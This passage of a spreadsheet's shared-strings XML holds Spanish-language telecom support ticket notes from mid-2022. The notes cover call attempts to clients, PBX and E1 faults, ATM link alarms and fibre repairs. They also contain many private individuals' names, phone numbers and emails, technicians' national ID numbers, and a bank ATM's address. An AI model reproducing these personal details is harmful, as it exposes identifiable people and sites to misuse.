    <t>SE LLAMA A CLIENTE 33293633 - 25442000 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001218549 - 3001218734</t>
  </si>
  <si>
    <t>F4623520</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA JOSE MARTINEZ 54748937  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001228225</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIA JOSE MARTINEZ 54748937 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE DEJE EN OBSERVACION 1 HR Y QUE SE LLAME NUEVAMENTE**
ID 3001217307
**</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE MARIA JOSE MARTINEZ 54748937  ID: 3001234576, ATIENDE ENCARGADA DE TURNO
CONFIRMA SERVICIO OK, AUTORIZA CIERRE | SE NOTIFICA A ALEJANDRO.NAVARRO VIA SKYPE | WIP
SE TERMINARA DE VALIDAR MEDIANTE SD</t>
  </si>
  <si>
    <t>F4623530</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISMAEL MARTINEZ-55044212 ## INDICA UE REPORTA QUE EL GND 23795100  ## TIENE BLOQUEO ADMINSITRATIVO. COMENTA QUE HACE UNOS MINUTOS LE LLEGO LA FACTURA Y QUE ESO ES LO QUE REPORTA-:
REPORTA:
¿DEL POR QUE NO LLEGO ANTES LA FACTURA? ¿POR QUE TUVO QUE REALIZAR TRAMITES  PARA QUE LE DEIRAN LA FACTURA?
Y SOLICITA SE LE HABILITE EL E1 MIENTRAS EL GENERA CHEQUE PARA PAGAR- SE LE COMENTA QUE NOSOTROS UNICAMENTE VEMOS FALLAS + QUE NO SOMOS EL AERA ADMINSITRATIVA ## CLIENTE MOLESTO INSISTE EN QUE SE LE HABILITE EL E1 Y  NO COMPRENDE QUE NOSOTROS SOMOS UNICAMNTE FALLAS## SE PROCEDE AL CIERRE##</t>
  </si>
  <si>
    <t>F4623534</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MAURICIO GOMEZ A QUIEN SE LE SOLICITO RESET DE LA PBX YA QUE EN EL TICKET ANTERIOR ASI LEVANTO.
CLIENTE INDICA QUE YA NO HAY PERSONAL EN LA OFICINA. SOLICITA QUE SE LE LLAME MAÑANA A LAS 8:00AM PARA REALIZAR PRUEBAS.
3001229647
COLA:
NOMBRE: A: 0050377476386
NÚMERO: 0050377476386
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 0050377476386
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/06/2022 18:09:24</t>
  </si>
  <si>
    <t>CLIENTE DENYS SORTO 77477605 APOYA REINICIANDO SU PLANTA PBX PERO INCONVENIENTE PERSISTE, SE CONTINUA EN LINEA</t>
  </si>
  <si>
    <t>F4623536</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 NO RESPONDE, SE INTENTARA LUEGO **
-ID 3001373402
**</t>
  </si>
  <si>
    <t>CLIENTE VALIDA QUE LAS LLAMADAS AL GDN 22054000 NO COMPLETAN. SE LE SOLICITA AL CLIENTE REINICIAR SU PLANTA PBX. CLIENTE INDICA QUE SOLICITARÁ EL REINICIO DE LA PBX Y SE LE LLAME EN 2HORAS. ID DE LLAMADA: 3001836146</t>
  </si>
  <si>
    <t>SE LOGRA COMUNICACIÓN CON ESTUARDO SIERRA 50194257, CLIENTE INDICA QUE HOY POR SER FERIADO NO LABORAN, HASTA MAÑANA ESTARÁ PERSONAL EN SUS OFICINAS, CLIENTE COMENTA QUE NO RECIBEN LLAMADAS PERO SÍ GENERAN, INDICA QUE SE PUEDA ENVIAR TÉCNICO MAÑANA EN HORARIO HÁBIL, NO ES NECESARIO TRAMITAR PERMISOS. ADICIONAL COMENTA QUE ESTARÁ FUERA DEL PAIS EL DÍA DE HOY Y REGRESARÁ EL DÍA MIÉRCOLES (NO INDICA HORA)
 ID DE LLAMADA: 3001673144</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001827360</t>
  </si>
  <si>
    <t>SE HABLA CON STEVEN MONESTEL +506 25195941, SE LE COMENTAN LOS RESULTADOS DE LAS PRUEBAS REALIZADAS FÍSICAMENTE EN SUS INSTALACIONES CON APOYO DE UN VE-EX, EN LAS CUALES SE LOGRÓ GENERAR Y RECIBIR LLAMADAS CON EL GDN 22054000. AL CONECTAR NUEVAMENTE SU PBX LAS LLAMADAS YA NO COMPLETAN. PRUEBAS SE REALIZARON EN PRESENCIA DE CLAUDIA FLORES QUIEN VALIDÓ EL FUNCIONAMIENTO CON EL VEEX.
CLIENTE ENTERADO INDICA QUE YA APERTURÓ UN CASO CON SU PROVEEDOR DE LA PBX. AUTORIZA EL CIERRE DEL TICKET.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050625195941
NÚMERO: 0050625195941
INICIO: HOY, 11:11 A. M.
FIN: HOY, 11:13 A. M.
DURACIÓN: 2:30
ID DE LLAMADA: 3001885667</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE MONICA MARTINEZ 5482 8084 CLIENTE SOLICITA VISITA TÉCNICA PARA CERTIFICAR EL E1. SE PROCEDE A COORDINAR. 3001844858</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SIERRA AL  50194257 NO RESPONDE || ENVIA DIRECTO A BUZON DE VOZ || SE INTENTARA LUEGO **
-ID 3001267747
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE STEVEN MONESTEL 25195941 SUENA DESCONECTADO**
-ID 3001326858
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 NO RESPONDE, ENVIA A BUZON SE INTENARA LUEGO**
-ID 3001326358
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE STEVEN MONESTEL 25195941 SUENA DESCONECTADO
-ID 3001311376</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 NO RESPONDE, SE INTENARA LUEGO
-ID 3001311089</t>
  </si>
  <si>
    <t>SE LLAMA A STEVEN MONESTEL AL +506 2519 5941 BRINDA CONTACTO DE GUATEMALA ESTUARDO SIERRA 50194257</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ESTUARDO SIERRA 50194257  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001402405</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 NO RESPONDE, ENVIA A BUZON SE INTENARA LUEGO**
-ID 30013246352
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 SIGUE SIN  RESPONDER CLIENTE , SE INTENTARA LUEGO **
-ID 3001396312
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SIERRA 50194257 NO RESPONDE, SE INTENTARA LUEGO **
-ID 3001369410
**</t>
  </si>
  <si>
    <t>F4623555</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE FIDEL  VASQUEZ, QUIEN INDICA QUE A LAS 11:40 SE QUEDO SIN SERVICIO PERO REINCIO LOS EQUIPOS Y HASTA EL MOMMENTO EL SERVICIO SE ENCUENTRA ESTABLE.
3001219140
COLA:
NOMBRE: A: 0050360459785
NÚMERO: 0050360459785
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 0050360459785
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/06/2022 17:08:57</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE FIDEL PERO ENVIA A BUZON.
3001217318
COLA:
NOMBRE: A: 0050360459785
NÚMERO: 0050360459785
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050360459785
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/06/2022 17:00:54</t>
  </si>
  <si>
    <t>F4623588</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL 24207200 EXT 2345 NO RESPONDE | SE INTENTARA LUEGO **
-ID 3001253510
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL 24207200 EXT 2345 NO RESPONDE | SE INTENTARA LUEGO **
-ID 3001268962 - 3001269126
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL 24207200 EXT 2345 NO RESPONDE | SE INTENTARA LUEGO **
-ID 3001257324
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001305390</t>
  </si>
  <si>
    <t>F4623598</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE CRISTOBAL RAMOS 47214954  ID: 3001241734, CL COMENTA QUE EL PROBLEMA SE DA CUANDO LLUEVE,
CL CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A ALEJANDRO.NAVARRO VIA  SKYPE | WIP</t>
  </si>
  <si>
    <t>F4623646</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B, INDICA PERSONAL QUE EL DIA DE HOY ESTA CERRADA LA AGENCIA POR LO CUAL NO SE PUEDE VALIDAR TEMAS DE ENERGIA, POR LO QUE SE DARA SEGUIMIENTO EL DIA DE MAÑANA, ADICIONAL SE LE INFORMA QUE SE MANTUVO EN OBSERVACION DESDE EL DIA VIERNES HA TENIDO PROBLEMAS DE ENERGIA, LEVANTO UN MOMENTO PERO CAYO NUEVAMENTE, SE DARA SEGUIMIENTO EL DIA DE MAÑANA EN HORARIO HABIL AGENCIA (EN DONDE SE UBICA ATM) CERRADA POR ASUETO.
ID
3001769068
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:32
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 4/07/2022 15:32:22</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B 24207212, CORTAN LA LLAMADA
ID
3001768668
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 4/07/2022 15:29:21</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B, SE LE INFORMA ENLACE ALARMADO, ATIENDE FREDY INDICA QUE POR ESTAR EL CAJERO EN AGENCIA ES POSIBLE QUE YA NO ESTEN LABORANDO PERO QUE OBSERVA UPS SIN CARGA, POSIBLEMENTE POR LA ENERGIA QUE CONTINUA INESTABLE EN EL LUGAR. TT PERMANECE EN PENDIENTE CLIENTE
ID
3001534308
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 2/07/2022 14:32:14</t>
  </si>
  <si>
    <t>F4623668</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SE QUEDA AL PENDINETE DE SUS COMENTARIOS.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 30 DE JUNIO DE 2022 19:48PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL ALARMADO PARA CLIENTE "CC_TYT_GT_ATM0762"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL ENLACE PRINCIPAL, SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPOS DE ÚLTIMA MILLA "ASMI54L" SE ENCUENTRE ENERGIZADO Y VALIDAR CONEXIONES ENTRE DICHO EQUIPO Y ROUTER TELDAT, SE ADJUNTA TELÉFONOS DEL CNOC 24206231 CON OPCIÓN 1/2 SI SE REQUIERE APOYO.
NOTA: ACTUALMENTE EL CAJERO SE ENCUENTRA OPERANDO VÍA ENLACE REDUNDANTE 3G POR LO QUE NOTARAN ELEVADOS TIEMPOS DE RESPUESTA.
CONNECTOR     INTERFACE            MAC/DATA-LINK        STATUS
EXP/SWITCH    ETHERNET0/0          ETHERNET/IEEE 802.3  UP
WAN           ETHERNET0/1          ETHERNET/IEEE 802.3  DOWN      &lt;&lt;&lt;-----------------------INTERFACE PRINCIPAL CAÍDO DEL EQUIPO TELDAT HACIA EQUIPO ASMI 54L.
DSL1          ETHERNET0/2          ETHERNET/PTM         TESTING
DSL1          ATM0/0               ATM                  DOWN
SLOT1         CELLULAR1/0          ASYNC SERIAL LINE    UP
SLOT1         CELLULAR1/1          ASYNC SERIAL LINE    UP
---           PPP10                PPP                  UP
---           TNIP10               INTERNAL             UP
---           TNIP20               INTERNAL             UP
---           LOOPBACK5            NULL DEVICE          UP
---           ETHERNET0/1.10       IEEE 802.1Q/802.1P   DOWN
ID: 47501120T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0762
UBICADO EN:  ATM 767 / BANRURAL RIO HONDO, 3 CALLE 2-07 ZONA 1, ZACAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4623722</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CENTRAL PARA CONFIRMACION DE INFORMACION Y CIERRE DE CASO
RE: INC000003789465 || DEPOSITO SUCHI || ID: 441300026T</t>
  </si>
  <si>
    <t>F4623732</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 9:26
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G133 - SIN ENLACE CLARO - CON ID 629100017T
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE                                      IBM                     DPI
DANIEL MONTENEGRO           659473               2414 54425 0101
EDGAR DANIEL GOMEZ           89058                 1628 97243 14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VALIDA EL ENLACE JAQUELINE VELASQUEZ PARA EL CIERRE DE TICKET##
3001312418
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:39:46
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 1/07/2022 11:28:52</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO LOS PERMISOS
DE: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 9:46
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G133 - SIN ENLACE CLARO - CON ID 629100017T
BUEN DÍA,  YA SE HA CONTACTADO A G133 PUEDEN INGRESAR A LAS INSTALACIONES, PARA CUALQUIER REQUERIMIENTO CONTACTAR A JACKELINE VELASQUEZ 4106-3008.
SALUDOS,
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4623734</t>
  </si>
  <si>
    <t>SE LE INFORMA A CLIENTE ERICK PEREZ 53128610 QUE TECNICO DE CLARO ESTARÁ LLEGANDO APROX. EN 1 HORA. CLIENTE ENTERADO. SE TRABAJA EN PC YA QUE SERVICIO YA SE CERTIFICÓ Y EL PROBLEMA ES LA PBX DEL CLIENTE, PERO PROVEEDOR REQUIERE QUE SE LE DEMUESTRE EN EL PR.</t>
  </si>
  <si>
    <t>SE TIENE EN CONFERENCIA A CLIENTE ERICK PEREZ 53128610 Y A PROVEEDOR OSCAR 55240001, PROVEEDOR NECESITA VERIFICAR INFORMACIÓN DEL E1, COMENTA QUE DE SU LADO NO VEN INCONVENIENTES, SE LE EXPLICA QUE A NIVEL DE CLARO YA SE CERTIFICÓ E.</t>
  </si>
  <si>
    <t>SE CORTA LA LLAMADA EN CONFERENCIA, SE LLAMA DE NUEVO AL CLIENTE QUIEN COMENTA QUE PROVEEDOR SOLICITA QUE LA VISITA SEA EN CONJUNTO EN LAS INSTALACIONES DEL CLIENTE.</t>
  </si>
  <si>
    <t>F4623756</t>
  </si>
  <si>
    <t>***--- CL SOLICITA LOS PARAMETROS DE FO VÍA MAIL *--*-*
DE: JERZON CULAJAY [MAILTO:JERZON.CULAJAY@INFINITUM.COM.GT]
ENVIADO EL: JUEVES, 30 DE JUNIO DE 2022 23:50
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: USUARIOS NOC &lt;NOC@INFINITUM.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SERVICIO DEGRADADO 617800055
BUENAS NOCHES,
NECESITAMOS QUE NOS COMPARTAN LOS PARÁMETROS DE F.O. Y QUE SE VERIFIQUE EL COMPORTAMIENTO DEL SERVICIO YA QUE PRESENTA PÉRDIDAS AUN CUANDO NO TIENE TRÁFICO.
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS,</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 15:58
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DOUGLAS PEREZ &lt;DOUGLAS.PEREZ@INFINITUM.COM.GT&gt;
CC: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JERZON CULAJAY &lt;JERZON.CULAJAY@INFINITUM.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; USUARIOS NOC &lt;NOC@INFINITUM.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SERVICIO DEGRADADO 617800055
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>***--- SE SOLICITA APOYO AL CNOC VÍA SKYPE EN EL GRUPO DE TEAMS --***</t>
  </si>
  <si>
    <t>F4623840</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 52 55 5174 5299CONTESTAN PERO DEJAN  EN ESPERA, SE  ESPERA POR MAS DE 4 MIN Y NO RETOMAN LA LLAMADA || SE INTENTARA LUEGO **
-ID 3001283423
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: SOLICITUD DE SOPORTE ::: VISA INTERNATIONAL - CREDOMATIC NICARAGUA - G65-M01690NI-NI1849-NP [4904668] - LINK FLAPPING || IMSAI001349</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 SOLICITAN TIEMPO EN ESPERA, SE TRATA ESPERAR POR MAS DE 5 MIN Y NO RETOMAN LA LLAMADA
-ID 3001268771</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 52 55 5174 5299 RESPONDE ALFONSO MENCIONA QUE EL INCONVENIENTE PERSISTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001300516</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTAN PERO DEJAN EN ESPERA LA LLAMADA Y NO LA RETOMAN || SE INTENTARA LUEGO **
-ID 3001256327
**</t>
  </si>
  <si>
    <t>F4623867</t>
  </si>
  <si>
    <t>***--- CL INSISTE QUE NO LLEGA AL ANCHO DE BANDA Y SOLICITA REVISIÓN DE FONDO --**
DE: JERZON CULAJAY [MAILTO:JERZON.CULAJAY@INFINITUM.COM.GT]
ENVIADO EL: VIERNES, 1 DE JULIO DE 2022 01:36
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: RICARDO BALL &lt;RICARDO.BALL@INFINITUM.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; USUARIOS NOC &lt;NOC@INFINITUM.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SERVICIO DEGRADADO
BUEN DIA,
SEGÚN EL CORREO INICIAL SE LES SOLICITÓ VERIFICAR EL ANCHO DE BANDA DEL SERVICIO YA QUE NO SE LLEGA A LA CAPACIDAD CONTRATADA.  NOSOTROS TAMBIÉN VEMOS EL SERVICIO ESTABLE.  FAVOR SU APOYO VERIFICANDO LO QUE SE SOLICITÓ.
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS,</t>
  </si>
  <si>
    <t>F4623887</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CHAVEZ AL 41289251 INDICA QUE EL SERVICIO YA ESTA ESTABLE PERO SOLICITA SABER CUAL FUE LA CAUSA DE LA AFECTACION || SE NOTIFICA A GESTOR **
-ID 3001253756
**</t>
  </si>
  <si>
    <t>F4623890</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CHAVEZ AL 41289251 INDICA QUE ESTA ESTABLE QUE SE DEJE EN OBSERVACION PARA LAS 17:00 HRS **
-ID 3001397504
**</t>
  </si>
  <si>
    <t>F4623893</t>
  </si>
  <si>
    <t>SE LLAMÓ DOS VECES A CLIENTE 41289251 PARA VALIDAR SERVICIO, TIEMPO DE MONITOREO HA FINALIZADO; SE HACE RECORDATORIO A CNOC CLARO VÍA SKYPE PARA VALIDAR CIERRE.</t>
  </si>
  <si>
    <t>F4623897</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DE PR  25041501 EXT 043311, 043321 NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001319744 - 3001320012 - 3001320501</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 25041690  NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001411887</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARIA ANDRES NICOLAS 51787555 ENVIA DIRECTO A BUZON
-ID 3001411014</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 51787555 PARA SEGUIMIENTO, NO CONTESTA; CENTRAL 23742016 TAMPOCO LO HACE; LLAMAR MAÑANA EN EL TRANSCURSO DEL DÍA.
SE ENVÍA CORREO A CLIENTE CENTRAL SOLICITÁNDOLE APOYO CON TELS ADICIONALES DEL PR COMO HORARIO DE ATENCIÓN</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA ANDRES NICOLAS 51787555 NO RESPONDE, ENVIA DIRECTO A BUZON
-ID 3001319357</t>
  </si>
  <si>
    <t>SE LLAMA A LA CENTRAL PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001321284</t>
  </si>
  <si>
    <t>F4623900</t>
  </si>
  <si>
    <t>**SE LLAMA AL 66209720 EXT 871084 CONTESTA EL SEÑOR GUSTAVO INFORMA QUE YA ESTA ESTABLE EL SERVICIO Y AUTORIZA CIERRE DEL TICKET **
-ID 3001278802
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL 66209720 EXT 871084 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001254982
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAYNOR LARIOS AL 66209720 EXT 113021 CONTESTA UN SEÑOR Y SOLICITA QUE SE LE LLAME AL 66209720 EXT 871084**
-ID 3001254738
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IVAN RIVERA CEL. 503-74972469-503-7730-4783 PRIMER NUMERO EQUIVOCADO Y EL SEGUNDO ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001254288 - 3001254395
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL 66209720 EXT 871084 GUSTAVO
-ID 3001278802
**</t>
  </si>
  <si>
    <t>F4623924</t>
  </si>
  <si>
    <t>SE ENCUNTRAN CAMBIANDO UNOS PICTAILS PARA PODER REALIZAR MEDICIONES YA QUE POR EL TIPO DE CORTE EN EL CONECTO APC TEINEN QUE COLOCAR UNAS UPC NO SEPUEDE REALIZAR LA MEDICION POR EL EQUIPO INDICA TECNICO ASIGNADO BYRON GASPARICO 58261005 || AVANCES EN 1 HORA QUE SE BRINDARAN AVANCES</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE, AUTORICA INGRESO PARA PERSONAL TECNICO
DE: LUIS CHEN &lt;LUISCHEN@ICASA.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 17:29
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GUSTAVO DUARTE &lt;GUSTAVODUARTE@ICASA.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; MAYNOR LARIOS &lt;MAYNORLARIOS@ICASA.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JEFE ADMON. ZONA 18 &lt;MAYNORFLORES@ICASA.COM.GT&gt;; GARITA DE ENTRADA MEGA AGENCIA EL ATLÁNTICO &lt;GARITAEZ18@ICASA.COM.GT&gt;
ASUNTO: RE: ENLACE MEGA 18 SECUNDARIO (192.168.50.21) CLARO ID:58700010 , DOWN
BUEN DÍA JAIME, POR FAVOR PROCEDER, GRACIAS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>ESTUARDO LOPEZ: / EDY TZUN  22616305 / 30062487 / 5990 7924 NO REPONDE SE SE LLAMA A 66209720 EXT 113021 INDICAN QUE YA SE RETIRARON DEJA EL TTK PENDIENTE PARA VALIDAR EN HORARIO HABIL.</t>
  </si>
  <si>
    <t>SERVICIO YA SE ENCUENTRA OPERATIVO POR PARTE DE PLANTA EXTERNA. SE REALIZO FUCION DE HILO Y SE REALIZO LIMPIEZA DE CONECTORES EN NODO POR QUE TENIA NIVELES BAJOS DE POTENCIA ACTUALMENTE OPERATIVO SE TIENE UNAS PERDIDAS AL PARECER ES POR EL NIVEL DE SIGNAL ES DE -18 EN EL CLIENTE.
&lt;GNCYGTLON2D1D02A02EIM2&gt;PIN -C 1000 -B -M 50  -VP CERVECERIADATOS 10.18.48.234
  PING 10.18.48.234: 56  DATA BYTES, PRESS CTRL_C TO BREAK
